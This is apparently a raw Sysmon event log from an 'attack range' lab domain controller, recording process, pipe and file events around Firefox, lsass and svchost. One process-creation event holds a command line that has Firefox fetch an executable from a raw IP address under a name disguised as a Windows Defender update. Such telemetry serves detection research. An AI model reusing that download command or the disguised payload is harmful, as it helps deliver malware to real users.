Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000043361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:58.727{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.1.75608265C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4c7a|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:58.727{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604\chrome.3240.0.37624781C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.727{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406716C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:58.727{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604\gecko-crash-server-pipe.3240C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-E4A2-63C7-4806-00000000AF02}32407044C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+186e3eb|C:\Program Files\Mozilla Firefox\xul.dll+9e34c6|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.712{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3240.0.376247814\1753629478" -parentBuildID 20230112150232 -prefsHandle 1336 -prefMapHandle 1328 -prefsLen 25860 -prefMapSize 234522 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f54958ec-e0e2-4db5-8389-27225b05a42f} 3240 "\\.\pipe\gecko-crash-server-pipe.3240" 1408 1d970831358 gpuC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000043346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.696{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000043345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:58.696{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.0.37624781C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:58.696{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko-crash-server-pipe.3240C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.681{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d41c2|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.681{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.602{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\parent.lockMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.571{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.571{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla 